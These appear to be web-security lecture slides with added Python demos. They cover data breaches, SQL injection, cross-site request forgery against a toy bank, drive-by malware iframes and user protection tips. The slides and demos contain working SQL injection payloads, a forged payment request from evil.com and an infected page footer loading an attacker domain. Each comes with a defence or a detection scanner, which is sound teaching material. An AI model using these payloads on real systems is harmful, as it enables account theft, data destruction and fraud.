Overview
• Data breaches
• Hacking / web application vulnerabilities
• What can software developers do?
• Malware distribution
• What is Google doing?
• What can you do to protect yourself?
• Is the sky falling?
• TJX (March 2007)
  – owns TJ Maxx, Marshalls, and other department stores
  – over 45 million credit card (CC) numbers, dating back to 2002
  – attackers exploited WEP used at branch stores
• Department of Veterans Affairs (August 2006)
  – Unisys (sub-contractor): equipment taken home, then stolen in a burglary
  – name, DOB, SSN, address, insurance data for 26.5M veterans
  – employee dismissed, supervisor resigned
• CardSystems (June 2005)
  – credit card payment processing company; now out of business
  – 43 million CC numbers stored unencrypted and compromised
  – 263,000 CC numbers stolen from the database via SQL injection
Data Breaches
Over 230 million lost or stolen customer records since 2005. How did that happen?
Source: privacyrights.org
(chart: records lost by cause: hacking, stolen equipment, lost equipment)
SQL Injection

Normal query: the web browser sends a username & password to the web server, which builds the query and sends it to the database:

  SELECT passwd FROM USERS
  WHERE uname = '$username'

Malicious query: the attacker types  '; DROP TABLE USERS; --  into the "username" field, so the web server builds and sends:

  SELECT passwd FROM USERS
  WHERE uname = ''; DROP TABLE USERS; -- '

Result: eliminates all user accounts.
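The injection above, run against an in-memory SQLite table, as an added example that is not part of the original slides. The USERS rows are constructed test data; the query shape is the slide's. It shows the string-built query handing every password to a username of  ' OR 1=1 -- , the parameterised version treating the same input as a plain string, and the slide's DROP TABLE payload: Python's sqlite3 refuses stacked statements in execute(), so executescript() is used to stand in for a driver or server that allows them.

```python
import sqlite3

# Added example; not code from the original slides. Table and rows are
# constructed test data; the query text follows the slide.


def make_db():
    """In-memory USERS table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE USERS (uname TEXT PRIMARY KEY, passwd TEXT)")
    conn.executemany(
        "INSERT INTO USERS VALUES (?, ?)",
        [("alice", "ilovebob"), ("bob", "hunter2"), ("carol", "s3cret")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """The slide's query built by string interpolation: whatever the browser
    sent as the username is parsed by the database as SQL."""
    query = f"SELECT passwd FROM USERS WHERE uname = '{username}'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, username):
    """Parameterised query: the value travels separately from the SQL text
    and is never parsed as SQL, so quotes and comment markers are inert."""
    rows = conn.execute("SELECT passwd FROM USERS WHERE uname = ?", (username,))
    return [row[0] for row in rows]


def stacked_query_refused(conn, username):
    """sqlite3's execute() rejects more than one statement per call, so the
    slide's  '; DROP TABLE USERS; --  payload raises an exception here."""
    try:
        lookup_vulnerable(conn, username)
    except (sqlite3.Error, sqlite3.Warning):
        return True
    return False


def drop_table_attack(conn, username):
    """Same interpolated query run through executescript(), which accepts
    stacked statements. It stands in for a driver or server configured to
    allow multi-statement queries; there the slide's payload drops the table."""
    conn.executescript(f"SELECT passwd FROM USERS WHERE uname = '{username}'")


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "alice"))             # ['ilovebob']
    # A quote closes the string literal, OR 1=1 matches every row, and --
    # comments out the dangling quote: the lookup returns every password.
    print(lookup_vulnerable(conn, "' OR 1=1 --"))       # all three passwords
    print(lookup_safe(conn, "' OR 1=1 --"))             # []
    print(stacked_query_refused(conn, "'; DROP TABLE USERS; -- "))  # True
    drop_table_attack(conn, "'; DROP TABLE USERS; -- ")
    print(table_exists(conn, "USERS"))                  # False
```

The single-statement guard in sqlite3 is a property of that driver, not a defence: the  ' OR 1=1 --  payload needs only one statement and works everywhere the query is built from strings. Parameterised queries (or a prepared-statement API) are the fix; escaping quotes by hand is not.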
Cross-Site Request Forgery (XSRF)

Attack scenario: Alice is using a ("good") web application, www.bank.com (assume she is logged in with a session cookie). At the same time, in the same browser session, she is also visiting a ("malicious") web application, www.evil.com.
XSRF: the message flow

1. Alice → bank.com: GET /login.html
2. Alice → bank.com: /auth  uname=alice&pass=ilovebob
   bank.com → Alice: Set-Cookie: sessionid=40a4c04de
3. Alice → bank.com: /viewbalance  Cookie: sessionid=40a4c04de
   bank.com → Alice: "Your balance is $25,000"
4. Alice → evil.com: /evil.html, which contains
   <IMG SRC="http://bank.com/paybill?addr=123 evil st&amt=$10000">
5. Alice's browser → bank.com: /paybill?addr=123 evil st&amt=$10000  Cookie: sessionid=40a4c04de
   (the browser attaches bank.com's cookie to the image request automatically)
   bank.com → Alice: "OK. Payment Sent!"
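The flow above as a runnable model, added here and not taken from the original slides. bank.com, the /auth, /viewbalance and /paybill paths, the cookie name, Alice's credentials and the $25,000 balance come from the slides; the request model, the per-session token scheme and the Origin check are assumptions. With require_token=False the server behaves like the slide's bank and pays evil.com; with require_token=True the forged image request is refused while a payment from the bank's own form still goes through.

```python
import secrets
from dataclasses import dataclass, field

# Added example; not code from the original slides. The request model, token
# scheme and Origin check are assumptions; names and values follow the slides.

USERS = {"alice": "ilovebob"}   # constructed credential, as on the slide


@dataclass
class Request:
    method: str
    path: str
    params: dict
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


class Bank:
    """Toy bank.com. With require_token=False it behaves like the slide's
    server: any request carrying a valid session cookie is trusted."""

    def __init__(self, require_token=False):
        self.require_token = require_token
        self.sessions = {}                 # sessionid -> {"user", "csrf"}
        self.balances = {"alice": 25_000}

    def login(self, uname, passwd):
        """/auth: on success issue a session id (and a per-session CSRF token)."""
        if USERS.get(uname) != passwd:
            return None
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": uname, "csrf": secrets.token_hex(16)}
        return sid

    def csrf_token(self, sid):
        """Embedded in bank.com's own payment form. evil.com cannot read it:
        the same-origin policy keeps bank.com's pages out of its reach."""
        return self.sessions[sid]["csrf"]

    def handle(self, req):
        sess = self.sessions.get(req.cookies.get("sessionid"))
        if sess is None:
            return 401, "Login required"
        if req.path == "/viewbalance":
            return 200, f"Your balance is ${self.balances[sess['user']]:,}"
        if req.path == "/paybill":
            if self.require_token:
                # Hardened: a state change must be a POST that carries the
                # session's secret token. The forged <IMG> request is a GET
                # with no token, so it fails here before any money moves.
                sent = req.params.get("token", "")
                if req.method != "POST" or not secrets.compare_digest(sent, sess["csrf"]):
                    return 403, "Request rejected"
                # Belt and braces: a browser-supplied Origin that is not ours
                # is rejected too (it is absent on the forged GET, so the
                # token check is what actually stops this attack).
                origin = req.headers.get("Origin")
                if origin is not None and origin != "https://bank.com":
                    return 403, "Request rejected"
            self.balances[sess["user"]] -= int(req.params["amt"])
            return 200, "OK. Payment Sent!"
        return 404, "Not found"


def forged_request(sid):
    """What Alice's browser sends when evil.html's
    <IMG SRC="http://bank.com/paybill?addr=123 evil st&amt=10000"> loads:
    bank.com's cookie is attached automatically, there is no token, and the
    only hint of where the request came from is the Referer."""
    return Request("GET", "/paybill", {"addr": "123 evil st", "amt": "10000"},
                   cookies={"sessionid": sid},
                   headers={"Referer": "http://evil.com/evil.html"})


def run_attack(require_token):
    """Alice logs in, checks her balance, then visits evil.com.
    Returns (status, body, balance after the forged request)."""
    bank = Bank(require_token)
    sid = bank.login("alice", "ilovebob")
    status, body = bank.handle(Request("GET", "/viewbalance", {}, {"sessionid": sid}))
    assert (status, body) == (200, "Your balance is $25,000")
    status, body = bank.handle(forged_request(sid))
    return status, body, bank.balances["alice"]


def legitimate_payment():
    """The hardened bank still accepts a payment from its own form."""
    bank = Bank(require_token=True)
    sid = bank.login("alice", "ilovebob")
    req = Request("POST", "/paybill",
                  {"addr": "ACME Electric", "amt": "100", "token": bank.csrf_token(sid)},
                  cookies={"sessionid": sid}, headers={"Origin": "https://bank.com"})
    status, body = bank.handle(req)
    return status, body, bank.balances["alice"]


if __name__ == "__main__":
    print(run_attack(require_token=False))   # (200, 'OK. Payment Sent!', 15000)
    print(run_attack(require_token=True))    # (403, 'Request rejected', 25000)
    print(legitimate_payment())              # (200, 'OK. Payment Sent!', 24900)
```

The cookie is the problem: the browser sends it on every request to bank.com no matter which page triggered the request, so a cookie alone never proves the user meant to do anything. The token works because it lives in a page evil.com cannot read. Checking Referer alone is weaker, since browsers and proxies often strip it; today the SameSite cookie attribute gives a browser-side defence in depth, but a synchroniser token of this kind is still the standard server-side fix.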
What can the software community do?
• Software developers: arm / educate yourself (e.g., www.learnsecurity.com); elect a security czar for each project
• Managers: instrument the development process for security; organize for security (advisors, satellites, etc.); invest in training!
Malware
• Logs keystrokes (including passwords)
• Joins a botnet
• Sends email spam from your machine
• Countless other bad things...
Malware Distribution
• Old style: email, peer-to-peer, etc.
• New style: infect web pages & drive-by downloads

Example of an infected page: a forum footer with two injected iframes that pull content from an attacker-controlled domain:

<!-- Copyright Information --> <div align='center' class='copyright'>Powered by <a href="http://www.invisionboard.com">InvisionPowerBoard</a>(U) v1.3.1 Final ©2003 <a href='http://www.invisionpower.com'>IPS,Inc.</a></div><iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe> <iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>
Building Botnets with SQL Injection
1. Attacker queries a search engine for vulnerable sites.
2. Attacker injects malicious JavaScript / ActiveX into the target site(s) via SQL injection.
3. A user views the page and gets infected (drive-by download).
4. Attacker to the infected machine: "What do you want to do today?" Log keystrokes, DoS, etc.
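A site owner's first question after a mass injection like this is which pages now carry frames they never put there. The scanner below is an added example, not from the original slides: it parses stored page HTML and flags iframes that load a third-party host or are sized or styled to be invisible, the two signatures of injected malware frames. The sample page is constructed after the infected forum footer shown earlier; the same-host video frame and the 0x0 tracker frame are made up to exercise the checks.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Added example; not code from the original slides. SAMPLE_PAGE is constructed
# after the infected footer shown above; the last two frames are made up.
SAMPLE_PAGE = """
<div align='center' class='copyright'>Powered by
<a href="http://www.invisionboard.com">InvisionPowerBoard</a>(U) v1.3.1 Final
&copy;2003 <a href='http://www.invisionpower.com'>IPS,Inc.</a></div>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'></iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'></iframe>
<iframe src='/player/embed?id=42' width='400' height='300'></iframe>
<iframe src='http://forum.example.com/t.php' width='0' height='0'></iframe>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def suspicious_iframes(html, page_host):
    """Return (src, reasons) for frames that load a third-party host or that
    are sized/styled to be invisible to the visitor."""
    parser = IframeCollector()
    parser.feed(html)
    flagged = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname        # None for relative URLs
        reasons = []
        if host and host.lower() != page_host.lower():
            reasons.append(f"third-party host {host}")
        style = attrs.get("style", "").replace(" ", "").lower()
        if (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
                or "display:none" in style or "visibility:hidden" in style):
            reasons.append("invisible frame")
        if reasons:
            flagged.append((src, reasons))
    return flagged


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_PAGE, "forum.example.com"):
        print(src, "->", ", ".join(reasons))
```

Run this over the rendered HTML (or the database columns that feed it, since the injection lands in the database), and treat any third-party frame that is not on an allow-list of known embeds as a finding. Script tags and obfuscated inline JavaScript are the other common payloads and need the same treatment.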
Social Engineering
Example lure headlines (the subject lines used to get people to click):
• BREAKING NEWS: Abortion outlawed in California
• How to save money on gas
• Millions of credit card numbers stolen from bank database, find out if you are affected
• Google launches free music downloads in China
• Jerry Yang relinquishes control over Yahoo
• McCain gives up fighting for presidency
• US Dollar hits 6-year high, further gains expected
What can you do to protect yourself?
• Change the default router password. Use WPA.
• Use a personal firewall. Always keep it on.
• Use good anti-virus (e.g., pack.google.com).
• Install patches immediately. Use auto-update.
• Make backups or use a backup service.
• Use a browser with malware & phishing protection (e.g., Firefox 3).
• Don't install software you don't trust.
• Use bookmarks for financial sites (or Google).
• Check for SSL / HTTPS on important sites.
• Don't ignore security warnings.
• Use good passwords and reset questions.
• Use a credit card with a threshold limit.
• Consider virtual, one-time credit cards.
• If it sounds too good to be true, it probably is!
Summary
• What can software people do? Learn, organize, prevent, etc.
• What is Google doing? Protecting you while you search & browse.
• What can you do? Be vigilant!